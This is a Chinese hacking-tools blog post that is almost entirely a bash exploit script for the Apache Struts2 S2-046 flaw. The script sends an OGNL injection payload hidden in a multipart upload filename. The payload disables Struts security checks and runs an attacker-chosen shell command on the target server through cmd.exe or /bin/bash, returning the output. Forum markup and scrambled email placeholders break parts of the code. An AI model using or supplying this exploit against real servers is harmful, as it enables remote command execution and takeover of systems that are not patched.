st2-046 exp 

阿城's Blog - 关注网络安全 黑客技术爱好者-阿城's Blog是一个关注网络安全,热爱黑客技术,分享各种技术教程资讯 —关注交流|web安全|漏洞发布|网络攻防|信息安全|网站建设



st2-046 exp

2017-3-22 21:59 作者:阿城 | 黑客工具 |

代码如下:


#!/bin/bash[/align]

 
[align=left]url=$1[/align]
[align=left]cmd=$2[/align]
[align=left]shift[/align]
[align=left]shift[/align]
 

[align=left]boundary="---------------------------735323031399963166993862

150"[/align]

[align=left]content_type="multipart/form-data; boundary=$boundary"[/align]

[align=left]payload=$(echo "%{(#nike='multipart/form-data').(#[email protected]

[email protected]_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((

#container=#context['com.opensymphony.xwork2.ActionContext.container'])

.(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlU

[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.g

etExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=

'"$cmd"').(#iswin=(@[email protected]('os.name').toLowerCase

().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash'

,'-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectEr

rorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.Ser

[email protected]().getOutputStream())).(@org.apache.comm

[email protected](#process.getInputStream(),#ros)).(#ros.flush())}")[/align]

 

[align=left]printf -- "--$boundary\r\nContent-Disposition: form-data;

name=\"foo\"; filename=\"%s\0b\"\r\nContent-Type: text/plain\r\n\r\

nx\r\n--$boundary--\r\n\r\n" "$payload" | curl "$url" -H "Content-Ty

pe: $content_type" -H "Expect: " -H "Connection: close" --data-binary @- [email protected]

文章作者:阿城
文章地址:http://www.ac166.cn/post-127.html
版权所有 © 转载时必须以链接形式注明作者和原始出处!

 

仅供学习与交流,遵循法律法规 & 如有侵犯您的版权请联系我删除 & 手机版

CopyRight © 2016 阿城's Blog - 关注网络安全 黑客技术爱好者.  All rights reserved.